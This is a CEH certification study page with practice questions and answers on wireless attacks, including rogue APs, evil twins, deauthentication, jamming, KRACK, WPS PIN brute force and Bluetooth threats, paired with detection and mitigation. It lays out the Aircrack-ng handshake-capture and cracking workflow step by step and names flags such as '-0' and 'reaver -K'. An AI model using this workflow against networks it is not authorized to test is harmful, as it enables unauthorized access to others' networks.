In the Aircrack-ng WPA2 capture workflow, which tool injects deauthentication frames to force a connected client to reconnect so the 4-way handshake can be captured?

aireplay-ng. aireplay-ng performs frame injection, including the -0 deauthentication attack that forces a client off the AP; on reconnect it completes the 4-way handshake, which airodump-ng captures. airmon-ng only enables monitor mode, aircrack-ng does the offline cracking, and Kismet is a passive detector that never injects.

Why does the WPS PIN brute-force attack require at most roughly 11,000 attempts instead of 100 million?

The 8-digit PIN is checked in two halves (first 4 digits, then 3), and the 8th digit is a checksum, reducing the space to 10^4 + 10^3. WPS validates the PIN in two independent halves and the last digit is a derived checksum, so an attacker brute-forces 10^4 possibilities for the first half and 10^3 for the second — at most about 11,000 tries. Pixie-Dust can shortcut this to seconds offline on vulnerable chipsets. The PIN is not 4 digits and does not rotate per second.

A CEH question describes an attacker pushing unsolicited messages to nearby phones via Bluetooth without accessing any of their stored data. Which attack is this, and how does it differ from the related threat?

Bluejacking; unlike bluesnarfing it does not steal data, only sends unsolicited messages. Bluejacking pushes unsolicited messages and accesses no stored data, so it is an annoyance rather than a breach. Bluesnarfing, by contrast, is the unauthorized theft of data such as contacts and messages, and bluebugging hijacks device functions. The scenario describes no data access, which points to bluejacking.

Which detection method is appropriate for an RF jamming attack but NOT for an evil twin?

Spectrum analysis showing a sustained rise in the noise floor with elevated retransmissions. Jamming is a physical-layer availability attack that prevents valid frames from being decoded, so it is detected by spectrum analysis (noise-floor and retransmission rise), not by inspecting packets. An evil twin, by contrast, still emits valid frames and is detected by comparing SSID/BSSID pairs and analyzing management frames.

Wireless Threats and Attack Concepts — Free Study Guide 2026

Key Takeaways

A rogue access point is any unauthorized AP attached to the network; an evil twin is a rogue AP that impersonates a trusted SSID (often with a stronger signal) to lure clients
Deauthentication frames are unprotected management frames in pre-WPA3 networks, enabling denial of service and forcing reconnections that let an attacker capture the WPA2 handshake
The Aircrack-ng suite drives the WPA2 capture workflow: airmon-ng enables monitor mode, airodump-ng captures frames, aireplay-ng injects deauth, and aircrack-ng runs the offline dictionary attack
The WPS PIN attack exploits an 8-digit PIN validated in two halves (4 + 3 digits, with a checksum), reducing the search space to at most ~11,000 attempts; Pixie-Dust can recover it offline in seconds
Bluetooth faces bluejacking (unsolicited messages) and bluesnarfing (unauthorized data theft); defenders use non-discoverable mode, strong pairing, and disabling unused radios

How Wireless Attacks Are Categorized

For the CEH exam, group wireless threats by the security property they break. This framing beats memorizing tool names alone. The content below is conceptual and defensive — it explains what each attack does, the tool that performs it, and how a defender detects it, on networks you are authorized to test.

Rogue Access Point

A rogue AP is any wireless access point connected to the network without authorization — for example, an employee plugging in a personal AP for convenience. It creates an uncontrolled entry point that bypasses perimeter controls. Detection: a wireless intrusion prevention system (WIPS) compares observed BSSIDs against an authorized inventory; wired-side switch-port and MAC monitoring locates the device.

Evil Twin

An evil twin is a specialized rogue AP that copies a trusted SSID (and often a similar BSSID and stronger signal) so clients or auto-connect profiles join it instead of the real network. It enables on-path interception and credential capture via fake captive portals or a spoofed RADIUS endpoint. Detection: WIPS flags a duplicate SSID with an unexpected BSSID, a signal-strength anomaly, or an AP appearing where none is authorized.

Deauthentication and Disassociation

In networks without Protected Management Frames (802.11w), management frames are unauthenticated. Forged deauthentication/disassociation frames knock clients off the AP, causing denial of service and forcing reconnections — which an attacker uses to capture a fresh 4-way handshake. Detection: an abnormal burst of deauth frames or repeated client disconnects in WIPS logs.

RF Jamming

Jamming floods a frequency band with RF energy or noise so legitimate frames cannot be decoded. It is a pure availability attack at the physical layer. Detection: a spectrum analyzer or WIPS shows a sustained noise-floor rise and elevated retransmissions — packet capture alone reveals nothing because no valid frames exist.

The WPA2 Handshake Capture Workflow (Aircrack-ng)

The canonical WPA2-PSK attack chains the Aircrack-ng suite. CEH expects you to map each tool to its role:

Step	Tool	Role
1. Enable monitor mode	airmon-ng	Puts the adapter into monitor mode so it captures all 802.11 frames in range, not just its own
2. Discover targets	airodump-ng	Scans channels and lists APs (BSSID, channel, encryption) and associated clients
3. Capture on one channel	airodump-ng	Locks to the target's channel/BSSID and writes frames (including any handshake) to a `.cap` file
4. Force a handshake	aireplay-ng	Injects deauthentication frames (`-0`) at a connected client; on reconnect it performs the 4-way handshake, which airodump-ng captures
5. Crack offline	aircrack-ng	Runs a dictionary/wordlist (e.g., `rockyou.txt`) against the captured handshake to recover the passphrase

Other wireless tools CEH references:

Wifite — an automation wrapper that orchestrates the whole Aircrack-ng/WPS/PMKID flow against multiple targets with one command; useful for fast, repeatable authorized audits.
Kismet — a passive 802.11 (and Bluetooth/RF) detector, sniffer, and wireless IDS. It never injects; it identifies networks, can decloak hidden SSIDs in use, logs to PCAP, and supports GPS mapping (wardriving). Because it is passive, it is also a defensive monitoring tool.
Hashcat / John the Ripper — general password crackers that can accelerate WPA2 handshake/PMKID cracking with GPUs.

Cryptographic and Protocol Attacks

KRACK (Key Reinstallation Attack)

KRACK (2017) is a protocol-level weakness in the WPA2 4-way handshake. By replaying handshake message 3, an attacker forces the client to reinstall an already-in-use key, resetting nonces and packet counters and enabling decryption or replay of frames. KRACK is a flaw in the handshake state machine, not in AES. Mitigation: vendor patches on clients and APs; WPA3's SAE handshake removes this class of issue.

WPS PIN Attack (Reaver / Pixie-Dust)

Wi-Fi Protected Setup (WPS) lets users join with an 8-digit PIN. The protocol validates the PIN in two halves — the first 4 digits, then the next 3 — and the 8th digit is a checksum. That design collapses the brute-force space from 10^8 to 10^4 + 10^3 = at most ~11,000 attempts. Reaver performs the online brute force; the Pixie-Dust attack (reaver -K) exploits weak nonce generation in some chipsets to recover the PIN offline in seconds. Once the PIN is known, the WPA passphrase is revealed regardless of its strength. Mitigation: disable WPS entirely.

Bluetooth, RFID, and NFC Threats

Wireless is broader than Wi-Fi. CEH tests short-range radio threats and their named attacks.

Technology	Range	Representative threats	Defender focus
Bluetooth	~10 m (BR/EDR); more with BLE	Bluejacking (push unsolicited messages), bluesnarfing (steal contacts/data without consent), bluebugging (take control of the device), device discovery/tracking	Non-discoverable mode, Secure Connections pairing, disable when unused, patch stacks
RFID	cm to several m	Skimming/eavesdropping, tag cloning, replay	Shielding, mutual authentication, encrypted tags, minimal data on tag
NFC	< ~4 cm	Eavesdropping, data corruption, relay attacks	Short range as a control, transaction confirmation, encryption, disable when unused

Bluejacking vs bluesnarfing is a classic exam trap: bluejacking is harmless unsolicited messaging (annoyance, no data access), whereas bluesnarfing is the theft of data (contacts, calendars, messages) from a vulnerable device. Bluebugging goes further, hijacking call/messaging functions. Tools like Bluetooth scanners (e.g., btscanner) and Kismet discover nearby Bluetooth devices.

EC-Council Certified Ethical Hacker

CEH

7.3 Wireless Threats and Attack Concepts

Key Takeaways

How Wireless Attacks Are Categorized

Rogue Access Point

Evil Twin

Deauthentication and Disassociation

RF Jamming

The WPA2 Handshake Capture Workflow (Aircrack-ng)

Cryptographic and Protocol Attacks

KRACK (Key Reinstallation Attack)

WPS PIN Attack (Reaver / Pixie-Dust)

Bluetooth, RFID, and NFC Threats

EC-Council Certified Ethical Hacker

1Introduction & Exam Overview

2Reconnaissance, Footprinting, Scanning & Enumeration

3Vulnerability Analysis & System Hacking Phases

4Malware Threats, Sniffing & Social Engineering

5Network & Perimeter Hacking

6Web Server & Web Application Hacking

7Wireless Network Hacking

8Mobile Platform, IoT & OT Hacking

9Cloud Computing & Cryptography

CEH

7.3 Wireless Threats and Attack Concepts

Key Takeaways

How Wireless Attacks Are Categorized

Rogue Access Point

Evil Twin

Deauthentication and Disassociation

RF Jamming

The WPA2 Handshake Capture Workflow (Aircrack-ng)

Cryptographic and Protocol Attacks

KRACK (Key Reinstallation Attack)

WPS PIN Attack (Reaver / Pixie-Dust)

Bluetooth, RFID, and NFC Threats